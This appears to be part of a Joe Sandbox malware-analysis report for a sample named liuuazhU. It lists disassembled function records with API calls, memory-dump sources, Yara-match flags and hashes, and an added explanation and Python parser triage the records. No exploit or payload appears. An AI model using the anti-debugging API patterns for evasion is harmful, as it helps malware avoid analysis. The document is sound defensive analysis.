                                                                                        • Instruction Fuzzy Hash: 3DC022300082084EC202E3B4EC84D6A731EE780601F004230D0090632ACFB4A8CC02AC
                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                        • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 2579439406-0
                                                                                        • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                        • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                        • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                        • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
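The function record above (IsDebuggerPresent, SetUnhandledExceptionFilter(NULL), UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess with exit code C0000409) is the call order of the MSVC CRT's __raise_securityfailure(), the compiler-generated handler that runs when a /GS stack-cookie check fails. GetCurrentProcess takes no argument, so the C0000409 listed against it is STATUS_STACK_BUFFER_OVERRUN, pushed as the exit code for TerminateProcess; this particular IsDebuggerPresent is CRT boilerplate rather than a hand-written check. The Python below is an added example, not Joe Sandbox code: it parses records in the layout shown on this page, tags that sequence as the CRT handler, flags records that install their own unhandled-exception filter for manual review, and summarises per dumped region how many functions reference any API at all (most records from the 20D10000 and 20180000 regions on this page have none). The record layout is taken from this report; SAMPLE is a trimmed copy of three of its records (Opcode/Instruction ID and Snapshot File lines dropped), and the tag names are my own.

```python
"""Parse the per-function records of a Joe Sandbox 'Disassembly' section and triage
the API sequences they show. Added example, not Joe Sandbox code; the record layout is
taken from the report above, and SAMPLE is a trimmed copy of three of its records."""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass, field

# STATUS_STACK_BUFFER_OVERRUN: exit code the MSVC CRT's __raise_securityfailure() passes
# to TerminateProcess(GetCurrentProcess(), ...) after a /GS stack-cookie check fails.
STATUS_STACK_BUFFER_OVERRUN = "C0000409"
CRT_GS_FAILURE_SEQUENCE = ("IsDebuggerPresent", "SetUnhandledExceptionFilter",
                           "UnhandledExceptionFilter", "GetCurrentProcess", "TerminateProcess")
API_RE = re.compile(r"^(?P<name>\w+)\.\w+(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)    # one (api name, [args], ref) per call
    source_file: str = ""
    offset: str = ""                            # base address of the dumped region
    yara_match: bool = False
    similarity: dict = field(default_factory=dict)

def parse_records(text):
    """Split report text into records; a record ends at its Instruction Fuzzy Hash line."""
    records, rec, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
        elif line == "Yara matches":
            rec.yara_match = True
        elif line.startswith("•"):
            body = line.lstrip("•").strip()
            if section == "APIs" and (m := API_RE.match(body)):
                args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
                rec.apis.append((m.group("name"), args, m.group("ref")))
            elif section == "Memory Dump Source" and (m := SOURCE_RE.match(body)):
                rec.source_file, rec.offset = m.group("file"), m.group("offset")
            elif section == "Similarity":
                key, _, value = body.partition(":")
                rec.similarity[key.strip()] = value.strip()
                if key.strip() == "Instruction Fuzzy Hash":   # last field of every record
                    records.append(rec)
                    rec, section = FunctionRecord(), None
    return records

def _in_order(needle, haystack):
    it = iter(haystack)
    return all(any(n == h for h in it) for n in needle)

def classify(rec):
    """Tag a record by the API pattern it shows (tag names are this example's own)."""
    names = [name for name, _, _ in rec.apis]
    args = {a for _, call_args, _ in rec.apis for a in call_args}
    if not names:
        return "no-api-refs"
    if _in_order(CRT_GS_FAILURE_SEQUENCE, names) and STATUS_STACK_BUFFER_OVERRUN in args:
        return "crt-gs-failure-handler"   # compiler-generated; IsDebuggerPresent is CRT boilerplate
    if any(n == "SetUnhandledExceptionFilter" and a != ["00000000"] for n, a, _ in rec.apis):
        return "custom-exception-filter"  # crash handler or exception-based anti-debug: review
    return "other"

def summarize(records):
    """Per dumped region: record count, records with API references, Yara hits, tags."""
    out = defaultdict(lambda: {"records": 0, "with_apis": 0, "yara": 0, "tags": Counter()})
    for rec in records:
        s = out[rec.offset]
        s["records"] += 1
        s["with_apis"] += bool(rec.apis)
        s["yara"] += rec.yara_match
        s["tags"][classify(rec)] += 1
    return dict(out)

SAMPLE = """
APIs
• IsDebuggerPresent.KERNEL32 ref: 004136F4
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
• UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
• GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
• TerminateProcess.KERNEL32(00000000), ref: 00413737
Memory Dump Source
• Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
Memory Dump Source
• Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
Memory Dump Source
• Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
Similarity
• Instruction Fuzzy Hash: E1F1AD74E01228CFDB64CFA5C994BADBBB2BF98300F1481AAE509A7354DB355E85CF50
"""
```

Run `summarize(parse_records(SAMPLE))` on the constructed SAMPLE, or paste the whole Disassembly section of a report into `parse_records`, to get one summary per dumped region; the Yara and with_apis counts show which regions the sandbox actually resolved imports in, and the `custom-exception-filter` tag lists the functions worth opening in a disassembler.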
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                        • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                        • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                        • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .5vq
                                                                                        • API String ID: 0-493797296
                                                                                        • Opcode ID: d5f46204ae6b751ed2572c0324e83d287783b6f047dba51b7fc562c32ccda374
                                                                                        • Instruction ID: 38923ea0af74c8a5b002b893f72bba26e350d9c4dfed6c75abc4e95e261ae5ad
                                                                                        • Opcode Fuzzy Hash: d5f46204ae6b751ed2572c0324e83d287783b6f047dba51b7fc562c32ccda374
                                                                                        • Instruction Fuzzy Hash: 18729974E012298FDB65DF69C894BDDBBB2AF89300F1081E9D40CAB254DB35AE85CF54
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                        • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                        • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                        • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8c2bccbeb99dd4825637a033d5cc18d47da0e57b952ae65a920094eef867fd26
                                                                                        • Instruction ID: 2f326079cc784f4801ddf33ff814784f55e725dd6dd622c43bc49578abeb33e9
                                                                                        • Opcode Fuzzy Hash: 8c2bccbeb99dd4825637a033d5cc18d47da0e57b952ae65a920094eef867fd26
                                                                                        • Instruction Fuzzy Hash: E1F1AD74E01228CFDB64CFA5C994BADBBB2BF98300F1481AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 187acbcba5777f42e86e2ff3aa77d45794826f79140a2d9a0cb9170f63a72eaf
                                                                                        • Instruction ID: 8a0868d15264d94090d2f07acab2e57eded5201c1227ce7043a357150bf03cef
                                                                                        • Opcode Fuzzy Hash: 187acbcba5777f42e86e2ff3aa77d45794826f79140a2d9a0cb9170f63a72eaf
                                                                                        • Instruction Fuzzy Hash: ACF17E74E00228CFEB64DFA5C994BEDBBB2AF58300F1081AAE509A7355DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 67ccd80a90289821d1cf8dc33fd7620f99497564d6129edf0e90a3a997162d3f
                                                                                        • Instruction ID: 105cdf4cf3b361d126b94122823d1793606bf2819b2c1b26b85be44cef0b0f2a
                                                                                        • Opcode Fuzzy Hash: 67ccd80a90289821d1cf8dc33fd7620f99497564d6129edf0e90a3a997162d3f
                                                                                        • Instruction Fuzzy Hash: BEF17E74E00228CFEB64DFA5C994BDDBBB2BB98300F1081AAD519A7394DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e5229c1eeeaa76a6abf71276d1388b75dff69099cc59b2e797de4357e30b30d3
                                                                                        • Instruction ID: cb1d2f86c64880ed24910c1c370b7cc65752467bd185c514f0ee9cdd484cbd05
                                                                                        • Opcode Fuzzy Hash: e5229c1eeeaa76a6abf71276d1388b75dff69099cc59b2e797de4357e30b30d3
                                                                                        • Instruction Fuzzy Hash: BDF17E74E00228CFEB64DFA5C994BDDBBB2AF98300F1085AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3977b0fe39358a1ff37336eceafdee11c12c31f522c4ad82bfd3be5afb1335f6
                                                                                        • Instruction ID: f3abd828285d645b37d2ad38ad5d039882b297223881cf93e048199ade04dc67
                                                                                        • Opcode Fuzzy Hash: 3977b0fe39358a1ff37336eceafdee11c12c31f522c4ad82bfd3be5afb1335f6
                                                                                        • Instruction Fuzzy Hash: E1F18E74E00228CFEB64DFA5C994BEDBBB2BB58300F1081AAE519A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5dbc4c484e392442c61e151c6375040e95d7307d3399373198ee50ce00124936
                                                                                        • Instruction ID: d7c0b2a0e1d7d3e83aa0ea3dfe12dcdc0f63d6a57d90ea588c363dd9efa34ec2
                                                                                        • Opcode Fuzzy Hash: 5dbc4c484e392442c61e151c6375040e95d7307d3399373198ee50ce00124936
                                                                                        • Instruction Fuzzy Hash: 14F17E74E00228CFDB64DFA5C994BDDBBB2AF58300F1081AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d69b5c422efb5c0ef5c188439df77c0cfb1770e69f5586dd92b8007dda55155b
                                                                                        • Instruction ID: 5db60b21277b5390ed1998c1b1c06c08a054e661381f837a34ccba1f2457a290
                                                                                        • Opcode Fuzzy Hash: d69b5c422efb5c0ef5c188439df77c0cfb1770e69f5586dd92b8007dda55155b
                                                                                        • Instruction Fuzzy Hash: 93F17E74E00228CFEB64DFA5C994BDDBBB2BB98300F1085AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f21b715772947b89302c89917233ae25d01cc1380f4dbf81124a5f043ad8931
                                                                                        • Instruction ID: 3a3c4a3639a92c6d401f5e1a8255cfac5206891d2fe148ce4f70de7eba29ec5b
                                                                                        • Opcode Fuzzy Hash: 8f21b715772947b89302c89917233ae25d01cc1380f4dbf81124a5f043ad8931
                                                                                        • Instruction Fuzzy Hash: E0F16E74E00228CFEB64DFA5C994BDDBBB2AF58300F1085AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b44fcf07a89d5c69845949625ff529b4883e9fe6854e64339ec09d1cb761c05c
                                                                                        • Instruction ID: b3d6826d474d3ca34a55c60d53b1f607b95d5c53ea7ba5d5939cc0ea5f2131d3
                                                                                        • Opcode Fuzzy Hash: b44fcf07a89d5c69845949625ff529b4883e9fe6854e64339ec09d1cb761c05c
                                                                                        • Instruction Fuzzy Hash: FEF17E74E00228CFEB64DFA5C994BDDBBB2BB98300F1081AAD509A7394DB355E85DF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a94938c1d499943fa3254b5d22e68150a9cfa428da8350af3caa0eca352566b8
                                                                                        • Instruction ID: 0a523f3f56e42b8be8c0810556237d88bacac126204326189ea81a5bc4bc7850
                                                                                        • Opcode Fuzzy Hash: a94938c1d499943fa3254b5d22e68150a9cfa428da8350af3caa0eca352566b8
                                                                                        • Instruction Fuzzy Hash: 30F17E74E01228CFEB64DFA5C994BEDBBB2AF58300F1081AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f810c5c3cad21ec2b6ea742acb4adf7e5f1fae964537e48d86ee854f53b9e832
                                                                                        • Instruction ID: e629bf1be91d0cd092b5c72b2c3fb1db691265ac54ef8e3f71cccdee28da27f2
                                                                                        • Opcode Fuzzy Hash: f810c5c3cad21ec2b6ea742acb4adf7e5f1fae964537e48d86ee854f53b9e832
                                                                                        • Instruction Fuzzy Hash: 7FF17D74E00228CFDB64DFA5C994BEDBBB2BB98300F1481AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 72e2c1aba8fd0dfe431735a3618ee475f6215ae026b55608b149fa86e1413aca
                                                                                        • Instruction ID: 0b3a65235687ec2f7cdd65cc2519997035b98a3476a6e53ee059ddf3b2dea9e4
                                                                                        • Opcode Fuzzy Hash: 72e2c1aba8fd0dfe431735a3618ee475f6215ae026b55608b149fa86e1413aca
                                                                                        • Instruction Fuzzy Hash: D2F17E74E01228CFEB64DFA5C994BDDBBB2AF98300F1081AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7fd7ec3dfcf83c25434abc9baef2186df602e9bdd2bc4bea2e2f92dab2f477b2
                                                                                        • Instruction ID: e03064b68af91a9528002f3c1c3fce5eda2bfaade9ee509d3a65e0c677434bbd
                                                                                        • Opcode Fuzzy Hash: 7fd7ec3dfcf83c25434abc9baef2186df602e9bdd2bc4bea2e2f92dab2f477b2
                                                                                        • Instruction Fuzzy Hash: E8F18D74E01228CFDB64DFA9C994B9DBBB2BF98300F1081AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dc036f777a207ff5ae690d304131c2c3ccb56af2716046707f34aeb0599588bf
                                                                                        • Instruction ID: 4e1c08226f3577feca587aae3bf60fe8afbbd49db510ee726796c3176bd40fea
                                                                                        • Opcode Fuzzy Hash: dc036f777a207ff5ae690d304131c2c3ccb56af2716046707f34aeb0599588bf
                                                                                        • Instruction Fuzzy Hash: AEF19D74E01228CFDB64CFA9C994B9DBBB2AF98300F1085AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ebdbe6fc74d78a54e0cdcf96e4b5efb8cf64d68addb4a3908aa7feaf0259eb86
                                                                                        • Instruction ID: 4d570091832e8970d60b6ab34e8dc980110c95a9f7ca23015fdc28e5a901ddb9
                                                                                        • Opcode Fuzzy Hash: ebdbe6fc74d78a54e0cdcf96e4b5efb8cf64d68addb4a3908aa7feaf0259eb86
                                                                                        • Instruction Fuzzy Hash: 81F18D74E01228CFDB64DFA5C994B9DBBB2BF58300F1081AAE509A7354EB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 001c7a9a8daf03af245480d29488dee2e61beaf01f97565a6577be25fab22e38
                                                                                        • Instruction ID: ecab0fab4ab649090a110814bc8267df2d64800e0bb2ff5c08dac338b5c15c35
                                                                                        • Opcode Fuzzy Hash: 001c7a9a8daf03af245480d29488dee2e61beaf01f97565a6577be25fab22e38
                                                                                        • Instruction Fuzzy Hash: D5F18D74E01228CFDB64DFA5C994BEDBBB2AF98300F1081AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c33800ebd7e8988f0adecd697ff63c4b1ea516c236dc1c9a0f53b9361214e55f
                                                                                        • Instruction ID: 1d7f6383ccd4728caf7fbca01075908ddb278927c375b7719b16dfe5fab6d9a7
                                                                                        • Opcode Fuzzy Hash: c33800ebd7e8988f0adecd697ff63c4b1ea516c236dc1c9a0f53b9361214e55f
                                                                                        • Instruction Fuzzy Hash: 93F18D74E01228CFDB64CFA5C994BEDBBB2AB98300F1085AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fe16d69746e30f80c03036ecfc51952860ad8a421739b660e4b9510a35d417ba
                                                                                        • Instruction ID: 319247a696cd096f9ac548a91bb5a987a78adc87b34a4aca47393446cc42acd3
                                                                                        • Opcode Fuzzy Hash: fe16d69746e30f80c03036ecfc51952860ad8a421739b660e4b9510a35d417ba
                                                                                        • Instruction Fuzzy Hash: 1AF19D74E01228CFDB64DFA5C994BADBBB2AF98300F1081AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 49a974f8d8a4edf8d0f67b0d37f0594b289c1eb6612c6630d41e6f765a23317d
                                                                                        • Instruction ID: d2d9066bc2a041f17896456eab742304593ad2d2ac506e93ee1e9c3f82396180
                                                                                        • Opcode Fuzzy Hash: 49a974f8d8a4edf8d0f67b0d37f0594b289c1eb6612c6630d41e6f765a23317d
                                                                                        • Instruction Fuzzy Hash: D9F18E74E01228CFDB64CFA9C994BADBBB2BF58300F1081AAD509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6314f1783185bc0edbc4741fb8d438eb26eaa9c26e5ec6d83a4a02e96e4eaae
                                                                                        • Instruction ID: baa436db606c4fd36848bdc9657705d12e433de3ff2a0e53d00299d032b34cc8
                                                                                        • Opcode Fuzzy Hash: f6314f1783185bc0edbc4741fb8d438eb26eaa9c26e5ec6d83a4a02e96e4eaae
                                                                                        • Instruction Fuzzy Hash: 0AF18D74E01228CFDB64DFA5C994BADBBB2BF98300F1081AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5720c6db288975daecc130fb00e9b249306ca9f2b313b963ff7854d7ba058e98
                                                                                        • Instruction ID: 9ab8d0889682fc3a1136322c5651bba95dee98125705b7f73402c28ac9e86b47
                                                                                        • Opcode Fuzzy Hash: 5720c6db288975daecc130fb00e9b249306ca9f2b313b963ff7854d7ba058e98
                                                                                        • Instruction Fuzzy Hash: B5F18E74E01228CFDB64CFA9C994BADBBB2BF58300F1081AAD509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 396ff4d00c58848ac350f646174db21a0a8d72b8d1ac01ce4a2de2e6234c3fa5
